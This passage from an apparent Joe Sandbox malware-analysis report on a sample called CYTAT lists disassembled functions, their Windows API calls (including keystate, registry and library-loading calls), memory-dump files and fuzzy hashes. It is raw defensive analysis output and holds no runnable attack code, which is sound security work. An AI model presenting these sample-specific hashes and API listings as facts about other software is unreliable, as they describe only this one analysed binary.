                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                • String ID: 0
                                                • API String ID: 621800784-4108050209
                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                • String ID: \VH
                                                • API String ID: 3884216118-234962358
                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                • IsMenu.USER32(?), ref: 0044854D
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                • DrawMenuBar.USER32 ref: 004485AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert
                                                • String ID: 0
                                                • API String ID: 3076010158-4108050209
                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1589278365-1403004172
                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SysAnimate32
                                                • API String ID: 0-1011021900
                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                • GetFocus.USER32 ref: 0046157B
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                • __swprintf.LIBCMT ref: 00461608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                • String ID: %s%d
                                                • API String ID: 2645982514-1110647743
                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                APIs
                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                APIs
                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$FreeLoad
                                                • String ID:
                                                • API String ID: 2449869053-0
                                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                • String ID:
                                                • API String ID: 3539004672-0
                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID:
                                                • API String ID: 327565842-0
                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String
                                                • String ID:
                                                • API String ID: 2832842796-0
                                                • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Enum$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 2095303065-0
                                                • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
